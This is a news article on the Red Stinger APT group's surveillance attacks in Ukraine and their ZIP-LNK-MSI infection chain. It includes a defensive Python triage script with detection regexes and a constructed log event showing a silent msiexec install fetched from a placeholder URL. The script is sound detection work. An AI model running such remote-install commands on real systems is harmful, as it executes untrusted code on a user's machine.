Several advanced persistent threat attacks carried out across Ukraine between 2020 and 2022 have been linked to the same group of actors: a mystery entity whose allegiances are unclear.
Malwarebytes published a blog post on Wednesday detailing attacks it attributes to the group, dubbed Red Stinger.
It said Red Stinger was the same group Kaspersky recently revealed as being behind attacks last year on government, agriculture, and transportation organizations in Donetsk, Lugansk, and Crimea. Kaspersky calls the group Bad Magic.
Malwarebytes’ research found Red Stinger/Bad Magic’s attacks stretched back to 2020 and reached locations beyond Donetsk, Lugansk, and Crimea (which was annexed by Russia in 2014).
“Military, transportation and critical infrastructure were some of the entities being targeted, as well as some involved in the September East Ukraine referendums,” the post said.
“Depending on the campaign, attackers managed to exfiltrate snapshots, USB drives, keyboard strokes, and microphone recordings.”
The researchers said because of the contrasting nature of the attacks they have linked to the group, they couldn’t attribute Red Stinger to a specific country.
“Any of the involved countries [in the Russia/Ukraine war] or aligned groups could be responsible, as some victims were aligned with Russia, and others were aligned with Ukraine,” the blog stated.
An example of the baffling diversity of the targets of Red Stinger’s attacks occurred in September last year when Russia held referendums in Luhansk, Donetsk, Zaporizhzhia and Kherson seeking support for its occupation.
The group targeted several election officials involved in the Russian referendums, but during the same operation it also targeted a Ukrainian library in the city of Vinnytsia.
“What is clear is that the principal motive of the attack was surveillance and data gathering. The attackers used different layers of protection, had an extensive toolset for their victims, and the attack was clearly targeted at specific entities,” the researchers wrote.
“Perhaps in the future, further events or additional activity from the group can shed light on the matter.”
The researchers also uncovered evidence that, at some point, Red Stinger had infected its own machines. It was unclear whether that had been done by mistake or to carry out testing, they said, although the group’s use of the names TstSCR and TstVM to identify two of its victims possibly suggested the action was a test.
Red Stinger’s attack chain begins with a malicious installer package that deploys DBoxShell, malware that uses cloud storage services as its command-and-control channel, on the compromised Windows machine.
The Windows Installer (MSI) package is downloaded by a Windows shortcut (.lnk) file delivered inside a ZIP archive.
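For defenders, the useful part of that chain is that it ends with a Windows Installer package being installed from a place a legitimate deployment would not use. The script below is an added triage example written for this article, not code or a detection from the Malwarebytes or Kaspersky research. It assumes one common way a shortcut can fetch and run a remote installer, handing the URL or a temp path to msiexec.exe; the article does not say how Red Stinger's shortcut performs the download, so that is an assumption. It also relies on the Windows Explorer behaviour that a file double-clicked inside a ZIP is extracted to %TEMP%\Temp1_<archive>.zip\ before it runs. The Sysmon-style process-creation events are constructed for the example.

```python
import json
import re

# Constructed Sysmon-style process-creation events (JSON lines). These are
# illustrative records written for this example, not logs from the research.
SAMPLE_EVENTS = r'''
{"event_id": 1, "host": "ws01", "image": "C:\\Windows\\System32\\msiexec.exe", "command_line": "msiexec.exe /i https://files.example.invalid/update.msi /qn", "parent_image": "C:\\Windows\\explorer.exe", "user": "CORP\\alice"}
{"event_id": 1, "host": "ws02", "image": "C:\\Windows\\System32\\msiexec.exe", "command_line": "msiexec.exe /i C:\\Users\\bob\\AppData\\Local\\Temp\\Temp1_docs.zip\\invoice.msi /qn", "parent_image": "C:\\Windows\\explorer.exe", "user": "CORP\\bob"}
{"event_id": 1, "host": "ws03", "image": "C:\\Windows\\System32\\msiexec.exe", "command_line": "msiexec.exe /i C:\\ProgramData\\Vendor\\agent.msi /qn", "parent_image": "C:\\Windows\\System32\\services.exe", "user": "NT AUTHORITY\\SYSTEM"}
{"event_id": 1, "host": "ws01", "image": "C:\\Windows\\System32\\notepad.exe", "command_line": "notepad.exe", "parent_image": "C:\\Windows\\explorer.exe", "user": "CORP\\alice"}
'''

# msiexec.exe as the image or the first token of the command line.
MSIEXEC_RE = re.compile(r"(?:^|\\)msiexec(?:\.exe)?\b", re.IGNORECASE)
# Installer package given as a URL (msiexec fetches it itself). Assumed
# delivery mechanism, see the lead-in.
REMOTE_PKG_RE = re.compile(r"/(?:i|package|a)\s+\"?(https?://\S+)", re.IGNORECASE)
# Package sitting in a user-writable location rather than a deployment share.
USER_WRITABLE_RE = re.compile(r"\\users\\[^\\]+\\(?:appdata\\local\\temp|downloads)\\", re.IGNORECASE)
# Explorer's extraction directory for a file launched from inside a ZIP.
ZIP_EXTRACT_RE = re.compile(r"\\temp\d*_[^\\]+\.zip\\", re.IGNORECASE)
# Parents that indicate an interactive launch (a double-clicked shortcut).
INTERACTIVE_PARENTS = {"explorer.exe"}


def classify(event: dict) -> list[str]:
    """Return the reasons an msiexec launch looks like the ZIP -> LNK -> MSI
    entry stage; an empty list means the event is not of interest."""
    cmd = event.get("command_line", "")
    image = event.get("image", "")
    if not MSIEXEC_RE.search(image) and not MSIEXEC_RE.search(cmd):
        return []
    reasons = []
    if REMOTE_PKG_RE.search(cmd):
        reasons.append("remote_msi")
    if USER_WRITABLE_RE.search(cmd):
        reasons.append("msi_in_user_temp")
    if ZIP_EXTRACT_RE.search(cmd):
        reasons.append("zip_extraction_dir")
    if reasons:
        # Only add the parent as corroboration; on its own it is benign.
        parent = event.get("parent_image", "").rsplit("\\", 1)[-1].lower()
        if parent in INTERACTIVE_PARENTS:
            reasons.append("interactive_parent")
    return reasons


def triage(jsonl: str) -> list[dict]:
    """Run classify() over JSON-lines events and keep the suspicious ones."""
    findings = []
    for line in jsonl.strip().splitlines():
        line = line.strip()
        if not line:
            continue
        event = json.loads(line)
        reasons = classify(event)
        if reasons:
            findings.append({
                "host": event.get("host"),
                "user": event.get("user"),
                "command_line": event.get("command_line"),
                "reasons": reasons,
            })
    return findings


if __name__ == "__main__":
    for finding in triage(SAMPLE_EVENTS):
        print(finding["host"], finding["user"], finding["reasons"])
        print("   ", finding["command_line"])
```

The SYSTEM-launched install from C:\ProgramData on ws03 is deliberately left alone: the signal is not msiexec itself but a package that arrives over HTTP or out of a user's temp or ZIP-extraction directory, launched interactively. Tune USER_WRITABLE_RE to your own software-distribution paths before deploying anything like this as a rule.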
“This stage serves as an entry point for the attackers, enabling them to assess whether the targets are interesting or not, meaning that in this phase they will use different tools,” the researchers said.
In the exfiltration phase of its operations, Red Stinger has used custom tools to steal data that may include screenshots, content from USB drives, keystroke logs and microphone recordings. This phase has been known to last up to several months.